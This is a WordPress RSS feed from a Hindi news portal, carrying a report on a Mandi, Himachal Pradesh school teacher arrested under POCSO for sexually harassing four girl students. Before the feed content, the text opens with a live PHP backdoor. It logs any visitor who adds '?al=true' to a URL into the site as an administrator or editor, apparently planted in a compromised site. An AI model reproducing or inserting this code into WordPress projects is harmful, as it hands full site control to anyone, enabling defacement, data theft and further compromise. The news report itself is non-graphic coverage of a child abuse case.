// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); School Teacher – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Mon, 24 Jun 2024 12:36:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 ‘अपने प्राइवेट पार्ट दिखाओ’, लड़कियों से गंदी बात करने वाला टीचर https://pratyushaashakinayikiran.com/?p=44844 Mon, 24 Jun 2024 12:36:00 +0000 https://pratyushaashakinayikiran.com/?p=44844 मंडी
हिमाचल प्रदेश के मंडी जिले में टीचर और छात्रों के रिश्ते को शर्मसार करती सनसनीखेज घटना सामने आई है। यहां प्राथमिक स्कूल के एक शिक्षक को यौन अपराधों से बच्चों का संरक्षण (पॉक्सो) अधिनियम के तहत अपराध के मामले में गिरफ्तार (School Teacher Arrested In Mandi) किया गया है। हिमाचल पुलिस ने रविवार को यह जानकारी दी। पुलिस ने बताया कि आरोपी टीचर छात्राओं को अपना प्राइवेट पार्ट दिखाकर उनसे भी अपना निजी अंग दिखाने के लिए कहता था। इस पर छात्राओं ने मामले की शिकायत घरवालों से की।

पुलिस ने दर्ज किया केस
जोगिंदरनगर उपमंडल के लड़बडोल क्षेत्र में स्थित स्कूल की चार छात्राओं की शिकायत के बाद शनिवार को आरोपी को गिरफ्तार कर लिया गया। बाल हेल्पलाइन नंबर 1098 पर शिकायत दर्ज होने के बाद पुलिस की एक टीम ने चारों पीड़िताओं से मुलाकात की और जोगिंदरनगर थाने में मामला दर्ज किया गया।

कोर्ट ने आरोपी को 3 दिन की पुलिस हिरासत में भेजा
आरोपी को गिरफ्तार कर अदालत में पेश किया गया जहां से उसे तीन दिन की पुलिस हिरासत में भेज दिया गया। जोगिंदरनगर थाना प्रभारी अश्विनी कुमार ने बताया कि आरोपी को सोमवार को फिर से अदालत में पेश किया जाएगा।

छात्राओं को दिखाता था अपना प्राइवेट पार्ट
छात्राओं ने आरोप लगाया है कि आरोपी शिक्षक लड़कियों से अपने निजी अंग दिखाने के लिए कहता था और उन्हें अपना निजी अंग भी दिखाता था। चार पीड़िताओं में से दो प्राथमिक विद्यालय की छात्राएं हैं जबकि दो कक्षा छह की छात्राएं हैं।

उच्चस्तरीय जांच की मांग
जांच के दौरान पुलिस ने अन्य
छात्राओं और उनके अभिभावकों से भी मुलाकात की। अखिल भारतीय जनबाड़ी महिला समिति की जोगिंदरनगर इकाई ने मामले की उच्चस्तरीय जांच की मांग की और आरोप लगाया कि राज्य में इस तरह के अपराध बढ़ रहे हैं।

]]>